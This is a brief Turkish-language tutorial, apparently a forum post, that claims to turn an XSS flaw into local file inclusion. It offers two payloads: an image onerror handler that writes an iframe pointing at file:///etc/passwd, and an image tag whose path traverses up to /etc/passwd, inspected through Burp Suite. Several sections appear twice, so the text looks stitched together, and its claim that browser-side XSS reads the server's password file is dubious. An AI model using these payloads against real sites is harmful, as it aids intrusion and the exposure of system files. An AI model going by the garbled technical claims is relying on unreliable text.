Herkese Selamlar. Bugün sizlere XSS Açığını LFI'ye çevirmeyi anlatıp 2 tane payload vereceğim.
İlk öncelikle herkesin merak ettiği bir konuya değinmek istiyorum
----------------------------------------------------------------------------------------------------------------------------------------
Tüm XSS Türlerinde Geçerli. Reflecteddan tutun Dom XSS'e kadar
-----------------------------------------------------------------------------------------------------------------------------------------
Şimdi ise payloadlarımıza bakalım
1:
Burada kırmızı.png dosyasını göstermek istiyor eğer yok ise etc/passwd dosyasını iframe içerisinde gösterecek
Veee muazzam sonuç
-----------------------------------------------------------------------------------------------------------------------------------------
Şimdi ise payloadlarımıza bakalım
1:
JavaScript:
<img src="kırmızı.png" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
Veee muazzam sonuç
-----------------------------------------------------------------------------------------------------------------------
2:
(bunun için burp suite gerekmektedir)
burada ise bize resim olarak etc/passwdyi gösteriyor. Burp suite üzerinden requesti incelediğimizde ise
etc/passwd gözükecektir
Beni dinlediğiniz için teşekkürler görüşürüz
2:
(bunun için burp suite gerekmektedir)
HTML:
<img src="/../../../../../../../../../../../../etc/passwd">
etc/passwd gözükecektir
Beni dinlediğiniz için teşekkürler görüşürüz